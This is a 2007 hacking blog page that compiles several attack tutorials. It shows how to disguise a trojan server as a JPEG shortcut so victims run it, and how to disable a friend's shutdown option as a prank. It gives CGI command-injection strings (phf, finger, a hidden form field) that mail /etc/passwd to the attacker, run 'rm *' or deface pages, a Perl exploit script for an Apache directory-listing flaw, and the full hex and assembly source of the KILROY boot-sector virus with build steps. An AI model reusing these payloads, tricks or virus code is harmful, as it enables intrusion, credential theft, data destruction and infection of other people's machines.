Friday, November 9, 2007

...

http://www.underground-book.com/
keven mitnick
and his official site
http://www.hackemate.com.ar/

Converting .exe files to .jpg

Converting .exe files to .jpg
1. Firstly, create a new folder and make sure that the options 'show hidden files' is checked and ‘hide extensions for known file types’ is unchecked. Basically what u need is to see hidden files and see the extension of all your files on your pc.

2. Paste a copy of your server on the new created folder. let's say it's called server.exe (that's why you need the extension of files showing, cause you need to see it to change it)

3. Now you’re going to rename this server.exe to whatever you want, let’s say for example picture.jpeg

4. Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5. Now create a shortcut of this picture.jpeg in the same folder.

6. Now that you have a shortcut, rename it to whatever you want, for example, me.jpeg.

7. Go to properties (on file me.jpeg) and now you need to do some changes there.

8. First of all delete all the text on field START IN and leave it empty.

9. Then on field TARGET you need to write the path to open the other file (the server renamed picture.jpeg) so u have to write this: C:\WINDOWS\system32\cmd.exe /c picture.jpeg

10. The last field, c picture.jpeg is always the name of the first file. If you called the first file soccer.avi you gotta write C:\WINDOWS\system32\cmd.exe /c soccer.avi got it?

11. So what you’re doing is when someone clicks on me.jpeg, a cmd will execute the other file picture.jpeg and the server will run.

12. On that file me.jpeg (shortcut), go to properties and you have an option to change the icon. click that and a new window will pop up and u have to write this: %SystemRoot%\system32\SHELL32.dll . Then press OK.

13. You can set the properties HIDDEN for the first file (picture.jpeg) if you think it’s better to get a connection from someone.
14. But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter

Disable or remove shutdown

Disable or remove shutdown




=> remove shutdown from start menu and also from all other possible options.
=> hide shutdown from start menu
=> disable shutdown all togetherlearn to do it now!!! (it takes less than a minute to do so) Disclaimer: this is an article which just brings out the fact that removing the
shut down menu option from the start menu is possible. If you however get caught
by your manager or college system administrator, and get whipped in your ass, I
cannot be held responsible. This tool is a inbuilt tool present in windows XP, just like msgconfig. So you
got to execute this command using run. 1 . Start ->run and type gpedit.msc The gpedit stands for group policy and you can do wonders using this. Also if
you a minute with your pal’s system and this pal tries to flirt your girl friend
- You can make a lot of changes to his system in the time he leaves you alone
with his system, to have him go bonkers.
2. User configuration -> administrative Templates -> start menu and taskbar -> 3. This option opens up a pane on the right hand side. Identify the option named
- Remove SHUT DOWN on the start menu . 4. Double click Remove SHUT DOWN on the start menu option 5. a small screen pops up and you may like to read about the explanation in the
EXPLAIN TAB before you change the settings. 6. Just change the radio button TO ENABLED and say apply. 7. DONE. No need to log off or restart the system. (You may however have to find
a way to restart your system.) 8. This option disables the log off option from the system. From the start menu,
also from the life saver – three buttons CTRL - ALT - DEL options. This option goes well with the HIDING THE LOG OFF FROM START MENU… (To shut down ur system:-without using frm shut down menu) The solution is that u can switch user thru task manager (alt+ctrl+del) or by
pressing winkey+L where u get the option to turn off ur compy/restart/stand
by.
or u may create a shortcut using this shortcut location to shutdown ur sys %windir%\system32\shutdown.exe -s to restart, u can use this shortcut %windir%\system32\shutdown.exe -r

how to hack a website

how to hack a website
Hacking from your Web Browser

I - Introduction

This file will describe several techiniques to aquire a password file just by using an ordinary web browser. The information provided will be best described for the beginner hacker, but all hackers should benifit from this information. We will only cov

er phf in this file but, feel free to explore other programs in the cgi directory such as nph-test-cgi or test-cgi. And now . . . get comfortable… sit back…. and read.

II - Hacking from your Web Browser

There are several techniques on what I call “Web Browser Hacking”. Many beginners dont know that you cant query a etc/passwd file from your browser and in this chapter I will describe all the ways to aquire a passwd file. First you need to find a box t

hat is running the cgi-bin/phf file on their system. A great way to find out without trial and error is to go to www.altavista.com and just search on cgi-bin AND perl.exe or cgi-bin AND phf.

a. Finger box hacking:

Lets say you wanted to break into somewhere like …. hmmmm AOL. The first thing we would do is type in their web site in the URL: Http://www.aol.com. The next thing we would do is add /cgi-bin/finger to the web URL so it would look like this Http://

www.aol.com/cgi-bin/finger. If the finger gateway is operational a box should appear for you to enter the name you want to finger. If it is operational you have a chance to receive the etc/passwd file. Next thing you will probably want to do is search

for a mailto on the web page… just scan the page for any mailto refs. Go back to the finger box and type in this query…… nobody@nowhere.org ; /bin/mail me@junk.org < etc/passwd …this string takes nobody and emails the passwd file to your email

address. If this works you now have the etc/passwd file in your mailbox…. you can now run a crack program against it and have a little fun on their box.
b. The common cgi-bin/phf query:

This section is for the very beginning hacker (All advanced hackers need not apply) Lets take the same scenerio from the first example except in the URL we would type … http://www.aol.com/cgi-bin/phf … if the phf is operational and has not been rem

oved you should get a series of search boxes on the next page ( ignore these boxs) to your URL you would add this string ?Qalias=x%0a/bin/cat%20/etc/passwd… so the entire string would look like this http://www.aol.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20

/etc/passwd. This string will print out the etc/passwd file strait to your web browser all you need to do is save it as a file and again run a crack program against it. (This is considering that they are not :*: or :x .

c. Dont take my cgi form:

This section will explain how to use somebody else’s cgi form to obtain the etc/passwd file. Lets say you look at a document source from a web page and find this in the source:

This is a form to go to Modify





This is a simple form that asks a user to input a message to be sent to a script called doc.pl. Included in the doc.pl script is the following line which is assuming the line has already been parsed out.

system(”/usr/lib/sendmail -t $myaddress < $tempfile”)
Now lets set up your page:


Hack AOL



value=” ; rm * ;mail -s file youraddress@yourisp.com < /etc/passwd;”>




The semicolons in the hidden value field act as delimiters, they separate the UNIX commands, this executes commands on the same line. The system call in PERL and creates a UNIX shell, and in here mails the passwd file to you.
d. Changing web pages from your browser:

This short section will describe the string to use to edit a web page from your web browser. Same scenario as the first section…. http://www.aol.com…. we will then add the following string cgi-bin/phf?Qalias=x%0a/bin/echo%20 “some text and shit”%2
0>>filename.html…… This string will allow you to write to the filename.html and add “some text and shit” be noted it has to be in html format. You can place text, pictures or whatever you like.

III - Conclusion

This information should be able to direct a beginner in obtaining the etc/passwd file from a system using the web browser… It may also inform the guru’s and advanced hackers some bits of information of perl and cgi. In further reading check out my sec

ond file that will involve erasing log files from the web browser. I hope you all enjoyed this documentation and found it somewhat interesting…… wake up!!! thus I conclude…..

Modify.
IV - Suggested Reading

Phrack Magazine: Very informative…. covers just about everything from phreaking to hacking…. Just download all the damn articles.

Building Internet Firewalls by O’Reilly & Associates, Inc. aka “The Big Wooden Door”": Covers all kinds of attacks, different firewall solutions, and invulnerablities.

Perl in 21 days by Samsnet: Good starting book in Perl programming also covers security issues.

Cgi programming by Samsnet: Good starter for Cgi but if you dont know Perl or C programming then dont bother, also covers security issues.

source: Nictrick

..

http://www.hack.co.za/
http://www.binny.com/

Hack into Apache's servers?

Hack into Apache's servers?
#!/usr/bin/perl
#
# orginal by farm9, Inc. (copyright 2001)
# then modified by Siberian (www.sentry-labs.com)
# with more modifications by rfp (www.wiretrip.net/rfp/)
# and (of course) tested and re-writed by Cypher (Myself xD)
#
##########################################################################

use libwhisker;
use Getopt::Std;

# apache3.pl
# this exploit was modified to use the libwhisker library, which gives
#
# HTTP/1.1, proxy, and SSL support. Plus, small other changes.
# libwshisker can be downloaded at :
# http://www.wiretrip.net/rfp/p/doc.asp?id=21&iface=7

$|++;
my (%hin,%hout,%args);

print "Apache Artificially Long Slash Path Directory Listing Exploit\n";
print "SecurityFocus BID 2503\n\n";
print "Original exploit code written by Matt Watchinski (www.farm9.com)\n";
print "Rewritten and fixed by Siberian (www.sentry-labs.com)\n";
print "Tested and re-writed by Cypher (Brazil) gui_thomazi@usa.com\n";
print "Moved to libwhisker by rfp\n\n";

getopts("p:L:H:sP:R:h:",\%args);

if($args{h} eq ''){
print 'Usage: ./apache3.pl , where options:',"\n";
print '-h host host to scan (must be specified)',"\n";
print '-p ## host port (default: 80)',"\n";
print '-L ## low end/start of range (default: 1)',"\n";
print '-H ## high end/end of range (default: 8192)',"\n";
print '-P host HTTP proxy via host',"\n";
print '-R ## HTTP proxy port (default: 80)',"\n";
print '-s use SSL (can\'t be used with proxy)',"\n";
exit 0;
}
$low = $args{L} || 1;
$high = $args{H} || 8192;

&lw::http_init_request(\%hin); # setup our request hash

$hin{'whisker'}->{'host'}= $args{h};

$hin{'whisker'}->{'port'}= $args{p} || 80;

if(defined $args{s}){
$hin{'whisker'}->{'ssl'} = 1;

if(defined $args{P}){
print "SSL not currently compatible with proxy\n";
exit 1;
}
}

if(defined $args{'P'}){
$hin{'whisker'}->{'proxy_host'}=$args{P};
$hin{'whisker'}->{'proxy_port'}=$args{R} || 80;
print "Using proxy host $hin{'whisker'}->{'proxy_host'} on ";
print "port $hin{'whisker'}->{'proxy_port'}\n";
}

&lw::http_fixup_request(\%hin); # fix any HTTP requirements

for($c=$low; $c<=$high; $c++){

$hin{'whisker'}->{'uri'} = '/' x $c;

if(&lw::http_do_request(\%hin,\%hout)){
print "Error: $hout{'whisker'}->{'error'}\n";
exit 1;
} else {
if($hout{'whisker'}->{'http_resp'} == 200 &&
$hout{'whisker'}->{'data'}=~/index of/i){

print "Found result using $c slashes.\n";
exit 0;
}
}

print "."; # for status
}

many virus

WARNING: If you attempt to create a disk infected with
the KILROY virus, MARK IT CAREFULLY, and DO NOT BOOT
WITH IT, unless you are absolutely sure of what you are doing! If
you are not careful you could cause a run-away infection!! Remember
that any disk infected with this virus will display the message
“Kilroy was here” when it boots, so watch out for that message if
you have ever allowed the KILROY virus to execute on your
system! PROCEED AT YOUR OWN RISK!
The HEX listing of the Kilroy virus is as follows:
:10000000EB28904B494C524F59202000020201002E
:10001000027000D002FD0200090002000000000092
:1000200000001200000000010000FA33C08EC08EF4
:10003000D0BC007CBB780036C5371E561653BF1E99
:100040007CB90B00FCAC26803D007503AAEB014790
:10005000E2F38AC48ED8894702C7071E7CFBCD1302
:1000600072FEE83E01BB0005803EFD7D80742EBA25
:100070008001803E7504007424B90100B80102CDEE
:1000800013721A813EFE0655AA7512E8FE00BA8068
:1000900001B90100B80103CD137202EB32A01004C4
:1000A00024C0D0C0D0C0FEC03C027223BA0100B848
:1000B0000102B90100CD137216813EFE0655AA75E4
:1000C0000EE8C800BA0100B80103B90100CD13A0C1
:1000D000107C32E4F726167C03061C7C03060E7C9B
:1000E00050A3037CB82000F726117C8B1E0B7C03E9
:1000F000C348F7F30106037CBB000558E85D00B078
:1001000001E86F008BFBB90B00BEB27DF3A6740C47
:100110008BFBB90B00BEBD7DF3A675FEA11C05339C
:10012000D2F7360B7CFEC08BE8A1037C50BB0007E6
:10013000A1037CE82600B001E8380083ED01740BD0
:100140008306037C01031E0B7CEBE58A2E157C8A5B
:1001500016FD7D5BB870005033C050CB33D2F736FC
:10016000187CFEC28AEA33D2F7361A7C8816297CBC
:100170008BD0C3B402B106D2E60AF58BCA86E98AEF
:1001800016FD7D8A36297CCD1372FEC3BE1E7CBF50
:100190001E05B9DF01F3A4BE007CBF0005B90B004A
:1001A000F3A4C3BEC87DB40EAC0AC07404CD10EB7A
:1001B000F5C349424D42494F2020434F4D494F20FE
:1001C00020202020205359534B696C726F7920777F
:1001D00061732068657265210D0A0A000000000045
:1001E000000000000000000000000000000000000F
:1001F000000000000000000000000000000055AA00
:00000001FF
To load it onto a floppy disk, put a disk in drive A and format it
using the /s option to put DOS on the disk. Create the HEX file
KILROY.HEX from the above listing, and load it using LOAD.BAS
in Appendix F. Then create a batch file KILROY_H.BAT that looks
like this:
debug kilroy.com < kilroy_h.dbg
and a file KILROY_H.DBG that looks like this:
r cx
200
w 100 0 0 1
q
and execute KILROY_H with the newly formatted floppy disk in
drive A. The boot sector virus will be put on drive A. If you boot
from that disk even once, your hard disk will be promptly infected,
and you will have to reformat it to get rid of the virus, unless you
use the tools in Appendix G. DO NOT DO IT UNLESS YOU ARE
SURE YOU KNOW WHAT YOU ARE DOING.
The assembly language source listing for the Kilroy virus
(KILROY.ASM), in its entirety, is as follows:
;The KILROY one-sector boot sector virus will both boot up either MS-DOS or
;PC-DOS and it will infect other disks.
;This segment is where the first operating system file (IBMBIO.COM or IO.SYS)
;will be loaded and executed from. We don’t know (or care) what is there, but
;we do need the address to jump to defined in a separate segment so we can
;execute a far jump to it.
DOS_LOAD SEGMENT AT 0070H
ASSUME CS:DOS_LOAD
ORG 0
LOAD: DB 0 ;Start of the first operating system program
123 The Little Black Book of Computer Viruses
DOS_LOAD ENDS
MAIN SEGMENT BYTE
ASSUME CS:MAIN,DS:MAIN,SS:NOTHING
;This jump instruction is just here so we can compile this program as a COM
;file. It is never actually executed, and never becomes a part of the boot
;sector. Only the 512 bytes after the address 7C00 in this file become part of
;the boot sector.
ORG 100H
START: jmp BOOTSEC
;The following two definitions are BIOS RAM bytes which contain information
;about the number and type of disk drives in the computer. These are needed by
;the virus to decide on where to look to find drives to infect. They are not
;normally needed by an ordinary boot sector.
ORG 0410H
SYSTEM_INFO: DB ? ;System info byte: Take bits 6 & 7 and add 1 to
;get number of disk drives on this system
;(eg 01 = 2 drives)
ORG 0475H
HD_COUNT: DB ? ;Number of hard drives in the system
;This area is reserved for loading the boot sector from the disk which is going
;to be infected, as well as the first sector of the root directory, when
;checking for the existence of system files and loading the first system file.
ORG 0500H
DISK_BUF: DW ? ;Start of the buffer
ORG 06FEH
NEW_ID: DW ? ;Location of AA55H in boot sector loaded at
DISK_BUF
;Here is the start of the boot sector code. This is the chunk we will take out
;of the compiled COM file and put it in the first sector on a 360K floppy disk.
;Note that this MUST be loaded onto a 360K floppy to work, because the
;parameters in the data area that follow are set up to work only with a 360K
;disk!
ORG 7C00H
BOOTSEC: JMP BOOT ;Jump to start of boot sector code
ORG 7C03H ;Start of data area
DOS_ID: DB ’KILROY ’ ;Name of this boot sector (8 bytes)
SEC_SIZE: DW 200H ;Size of a sector, in bytes
SECS_PER_CLUST: DB 02 ;Number of sectors in a cluster
FAT_START: DW 1 ;Starting sector for the first FAT
FAT_COUNT: DB 2 ;Number of FATs on this disk
ROOT_ENTRIES: DW 70H ;Number of root directory entries
SEC_COUNT: DW 2D0H ;Total number of sectors on this disk
DISK_ID: DB 0FDH ;Disk type code (This is 360KB)
SECS_PER_FAT: DW 2 ;Number of sectors per FAT
SECS_PER_TRK: DW 9 ;Sectors per track for this drive
HEADS: DW 2 ;Number of heads (sides) on this drive
HIDDEN_SECS: DW 0 ;Number of hidden sectors on the disk
DSKBASETBL:
DB 0 ;Specify byte 1: step rate time, hd unload time
Appendix D: The KILROY Virus 124
DB 0 ;Specify byte 2: Head load time, DMA mode
DB 0 ;Wait time until motor turned off, in ticks
DB 0 ;Bytes per sector (0=128, 1=256, 2=512, 3=1024)
DB 12H ;Last sector number (lg enough to handle 1.44M)
DB 0 ;Gap length between sectors for r/w operations
DB 0 ;Data xfer lgth when sector lgth not specified
DB 0 ;Gap length between sectors for formatting
DB 0 ;Value stored in newly formatted sectors
DB 1 ;Head settle time, in milliseconds
DB 0 ;Motor startup time, in 1/8 seconds
HEAD: DB 0 ;Current head to read from
;Here is the start of the boot sector code
BOOT: CLI ;interrupts off
XOR AX,AX ;prepare to set up segments
MOV ES,AX ;set ES=0
MOV SS,AX ;start stack at 0000:7C00
MOV SP,OFFSET BOOTSEC
MOV BX,1EH*4 ;get address of disk
LDS SI,SS:[BX] ;param table in ds:si
PUSH DS
PUSH SI ;save that address
PUSH SS
PUSH BX ;and its address
MOV DI,OFFSET DSKBASETBL ;and update default
MOV CX,11 ;values to table values here
CLD ;direction flag cleared
DFLT1: LODSB
CMP BYTE PTR ES:[DI],0 ;anything non-zero
JNZ SHORT DFLT2 ;not default, so don’t save it
STOSB ;else use default value
JMP SHORT DFLT3 ;and go on to next
DFLT2: INC DI
DFLT3: LOOP DFLT1 ;and loop until cx=0
MOV AL,AH ;set ax=0
MOV DS,AX ;set ds=0 to set disk tbl
MOV WORD PTR [BX+2],AX ;to @DSKBASETBL (ax=0 here)
MOV WORD PTR [BX],OFFSET DSKBASETBL ;ok, done
STI ;now turn interrupts on
INT 13H ;and reset disk drive system
ERROR1: JC ERROR1 ;if an error, hang the machine
;Attempt to self reproduce. If this boot sector is located on drive A, it will
;attempt to relocate to drive C. If successful, it will stop, otherwise it will
;attempt to relocate to drive B. If this boot sector is located on drive C, it
;will attempt to relocate to drive B.
SPREAD:
CALL DISP_MSG ;Display the “Kilroy” message
MOV BX,OFFSET DISK_BUF ;put other boot sectors here
CMP BYTE PTR [DRIVE],80H
JZ SPREAD2 ;if C, go try to spread to B
MOV DX,180H ;if A, try to spread to C first
CMP BYTE PTR [HD_COUNT],0 ;see if there is a hard drive
JZ SPREAD2 ;none - try floppy B
MOV CX,1 ;read Track 0, Sector 1
MOV AX,201H
INT 13H
JC SPREAD2 ;on error, go try drive B
CMP WORD PTR [NEW_ID],0AA55H;make sure it’s a boot sector
JNZ SPREAD2
CALL MOVE_DATA
MOV DX,180H ;and go write the new sector
MOV CX,1
MOV AX,301H
INT 13H
JC SPREAD2 ;if error on c:, try b:
125 The Little Black Book of Computer Viruses
JMP SHORT LOOK_SYS ;ok, go look for system files
SPREAD2: MOV AL,BYTE PTR [SYSTEM_INFO] ;first see if there is a B:
AND AL,0C0H
ROL AL,1 ;put bits 6 & 7 into bits 0 & 1
ROL AL,1
INC AL ;add one, so now AL=# of drives
CMP AL,2
JC LOOK_SYS ;no B drive, just quit
MOV DX,1 ;read drive B
MOV AX,201H ;read one sector
MOV CX,1 ;read Track 0, Sector 1
INT 13H
JC LOOK_SYS ;if an error here, just exit
CMP WORD PTR [NEW_ID],0AA55H;make sure it’s a boot sector
JNZ LOOK_SYS ;no, don’t attempt reproduction
CALL MOVE_DATA ;yes, move boot sector to write
MOV DX,1
MOV AX,301H ;and write this boot sec to B:
MOV CX,1
INT 13H
;Here we look at the first file on the disk to see if it is the first MS-DOS or
;PC-DOS system file, IO.SYS or IBMBIO.COM, respectively.
LOOK_SYS:
MOV AL,BYTE PTR [FAT_COUNT] ;get fats per disk
XOR AH,AH
MUL WORD PTR [SECS_PER_FAT] ;multiply by sectors per fat
ADD AX,WORD PTR [HIDDEN_SECS] ;add hidden sectors
ADD AX,WORD PTR [FAT_START] ;add starting fat sector
PUSH AX
MOV WORD PTR [DOS_ID],AX ;root dir, save it
MOV AX,20H ;dir entry size
MUL WORD PTR [ROOT_ENTRIES] ;dir size in ax
MOV BX,WORD PTR [SEC_SIZE] ;sector size
ADD AX,BX ;add one sector
DEC AX ;decrement by 1
DIV BX ;ax=# sectors in root dir
ADD WORD PTR [DOS_ID],AX ;DOS_ID=start of data
MOV BX,OFFSET DISK_BUF ;set disk buffer to 0000:0500
POP AX
CALL CONVERT ;and go convert sec # for bios
MOV AL,1 ;prepare for a 1 sector read
CALL READ_DISK ;go read it
MOV DI,BX ;compare first file on disk
MOV CX,11 ;with required file name of
MOV SI,OFFSET SYSFILE_1 ;first system file for PC DOS
REPZ CMPSB
JZ SYSTEM_THERE ;ok, found it, go load it
MOV DI,BX ;compare first file with
MOV CX,11 ;required file name of
MOV SI,OFFSET SYSFILE_2 ;first system file for MS DOS
REPZ CMPSB
ERROR2: JNZ ERROR2 ;not the same - an error,
;so hang the machine
;Ok, system file is there, so load it
SYSTEM_THERE:
MOV AX,WORD PTR [DISK_BUF+1CH] ;get file size
XOR DX,DX ;of IBMBIO.COM/IO.SYS
DIV WORD PTR [SEC_SIZE] ;and divide by sector size
INC AL ;ax=number of sectors to read
MOV BP,AX ;store that number in BP
MOV AX,WORD PTR [DOS_ID] ;get sec # of start of data
PUSH AX
MOV BX,700H ;set disk buffer to 0000:0700
RD_BOOT1: MOV AX,WORD PTR [DOS_ID] ;and get sector to read
Appendix D: The KILROY Virus 126
CALL CONVERT ;convert to bios Trk/Cyl/Sec
MOV AL,1 ;read one sector
CALL READ_DISK ;go read the disk
SUB BP,1 ;- 1 from # of secs to read
JZ DO_BOOT ;and quit if we’re done
ADD WORD PTR [DOS_ID],1 ;add secs read to sec to read
ADD BX,WORD PTR [SEC_SIZE] ;and update buffer address
JMP RD_BOOT1 ;then go for another
;Ok, the first system file has been read in, now transfer control to it
DO_BOOT:
MOV CH,BYTE PTR [DISK_ID] ;Put drive type in ch
MOV DL,BYTE PTR [DRIVE] ;Drive number in dl
POP BX
; JMP FAR PTR LOAD ;use far jump with MASM or TASM
MOV AX,0070H ;A86 can’t handle that,
PUSH AX ;so let’s fool it with far ret
XOR AX,AX
PUSH AX
RETF
;Convert sequential sector number in ax to BIOS Track, Head, Sector
;information. Save track number in DX, sector number in CH,
CONVERT:
XOR DX,DX
DIV WORD PTR [SECS_PER_TRK] ;divide ax by sectors per track
INC DL ;dl=sector # to start read on,
MOV CH,DL ;al=track/head count
XOR DX,DX
DIV WORD PTR [HEADS] ;divide ax by head count
MOV BYTE PTR [HEAD],DL ;dl=head number, save it
MOV DX,AX ;ax=track number, save it in dx
RET
;Read the disk for the number of sectors in al, into the buffer es:bx, using
;the track number in DX, the head number at HEAD, and the sector
;number at CH.
READ_DISK:
MOV AH,2 ;read disk command
MOV CL,6 ;shift upper 2 bits of trk # to
SHL DH,CL ;the high bits in dh and put
OR DH,CH ;sector # in the low 6 bits
MOV CX,DX
XCHG CH,CL ;ch(0-5)=sec, cl/ch(6-7)=track
MOV DL,BYTE PTR [DRIVE] ;get drive number from here
MOV DH,BYTE PTR [HEAD] ;and head number from here
INT 13H ;go read the disk
ERROR3: JC ERROR3 ;hang in case of an error
RET
;Move data that doesn’t change from this boot sector to the one read in at
;DISK_BUF. That includes everything but the DRIVE ID (at offset 7DFDH) and
;the data area at the beginning of the boot sector.
MOVE_DATA:
MOV SI,OFFSET DSKBASETBL ;Move the boot sector code
MOV DI,OFFSET DISK_BUF + (OFFSET DSKBASETBL - OFFSET BOOTSEC)
MOV CX,OFFSET DRIVE - OFFSET DSKBASETBL
REP MOVSB
MOV SI,OFFSET BOOTSEC ;Move init jmp and sector ID
MOV DI,OFFSET DISK_BUF
MOV CX,11
REP MOVSB
RET
127 The Little Black Book of Computer Viruses
;Display the null terminated string at MESSAGE.
DISP_MSG:
MOV SI,OFFSET MESSAGE ;set offset of message up
DM1: MOV AH,0EH ;Execute BIOS INT 10H, Fctn 0EH
LODSB ;get character to display
OR AL,AL
JZ DM2 ;repeat until 0
INT 10H ;display it
JMP SHORT DM1 ;and get another
DM2: RET
SYSFILE_1: DB ’IBMBIO COM’ ;PC DOS System file
SYSFILE_2: DB ’IO SYS’ ;MS DOS System file
MESSAGE: DB ’Kilroy was here!’,0DH,0AH,0AH,0
ORG 7DFDH
DRIVE: DB 0 ;Disk drive for this sector
BOOT_ID: DW 0AA55H ;Boot sector ID word
MAIN ENDS
END START
To assemble this, you will need to create the file KILROY.DBG, as
follows:
r cx
200
w 7C00 0 0 1
q

If you want to use the Microsoft Assembler, create the batch file
KILROY_M.BAT as follows:
masm kilroy;
link kilroy;
exe2bin kilroy kilroy.com
debug kilroy.com < kilroy.dbg
del kilroy.obj
del kilroy.exe
del kilroy.com
and execute it with a freshly formatted disk (using the /s option) in
drive A. If you want to use the Turbo Assembler, create KILROY_
T.BAT:
tasm kilroy;
link kilroy;
exe2bin kilroy kilroy.com
debug kilroy.com < kilroy.dbg
del kilroy.obj
Appendix D: The KILROY Virus 128
del kilroy.map
del kilroy.exe
del kilroy.com
and do the same. If you are using A86, then the batch file KILROY_
A.BAT,
a86 kilroy.asm kilroy.com
debug kilroy.com < kilroy.dbg
del kilroy.com
will do the job, but remember, DO NOT ATTEMPT TO CREATE
THIS VIRUS UNLESS YOU KNOW WHAT YOU ARE DOING.
PROCEED AT YOUR OWN RISK!!